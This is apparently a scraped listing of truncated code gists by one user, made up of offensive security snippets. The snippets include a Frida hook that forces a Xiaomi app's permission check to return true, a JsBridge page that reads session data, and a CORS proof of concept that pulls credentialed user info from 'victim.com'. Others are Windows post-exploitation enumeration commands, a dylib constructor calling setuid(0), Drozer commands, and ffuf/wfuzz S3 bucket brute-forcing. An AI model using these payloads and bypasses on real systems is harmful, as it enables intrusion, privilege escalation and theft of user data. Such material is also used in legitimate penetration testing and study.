michaellcader

In android source code can get

<activity android:name=".PackageInstallerActivity">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <data android:scheme="content" />
        <data android:scheme="file" />

michaellcader

private String config(Config config, boolean z) {
        if (z) {
            SecurityManager securityManager = new SecurityManager(config, this.mActivity.getApplicationContext());
            if (securityManager.isExpired() || !securityManager.isValidSignature()) { // validation of the config object
                return new Response(202).toString();
            }
        }
        this.mFM = new FeatureManager(config, this.mActivity.getClassLoader());
        this.mPM = new PermissionManager(config);
        return new Response(0).toString();

michaellcader

Java.perform(function() {
	console.log("Starting hook");

	var Activity = Java.use("com.xiaomi.music.hybrid.internal.PermissionManager");
    Activity.isValid.implementation = function () {
        return true;
    };

	Java.choose("com.xiaomi.music.hybrid.internal.Config", {
	  onMatch: function(inst) {

michaellcader

<html>
  <body>
    <script src='remote-server/jsBridge-mix.js'> //host the jsBridge-mix.js from resources directory
      JsBridge.invoke("get_session_data", {}, function(a) { //the a variable will contain the response JSON object from the Java code
                        var i = {};
                        i = a;
                        window.alert(JSON.stringify(i);
                    })
    </script>
  </body>

michaellcader

# coding: utf-8
# py2 origin author lrdcq
# usage python3 unwxapkg.py filename

__author__ = 'Integ: https://github.com./integ'

import sys, os
import struct

class WxapkgFile(object):

michaellcader

# GET Method
<script type="text/javascript">
var req = new XMLHttpRequest(); 
req.onload = reqListener; 
req.open("get","victim.com/getUserInfo",true);
req.withCredentials = true;
req.send();
function reqListener(){alert(req.responseText);}
</script>

michaellcader

// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)
hostname
echo %username%

// Get users
net users
net user [username]

michaellcader

#include <stdio.h>
#include <syslog.h>
#include <stdlib.h>

__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
 {
	setuid(0);
 	system("id");
	printf("Hello from dylib!\n");

michaellcader

Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

    * Starting a session
      * `adb forward tcp:31415 tcp:31415`
      * `drozer console connect`
      * `drozer console connect --server <ip>`
    * List modules
 * `ls`

michaellcader

#!/bin/bash

Ffuf (faster):
ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v


Wfuzz:
wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50

The files: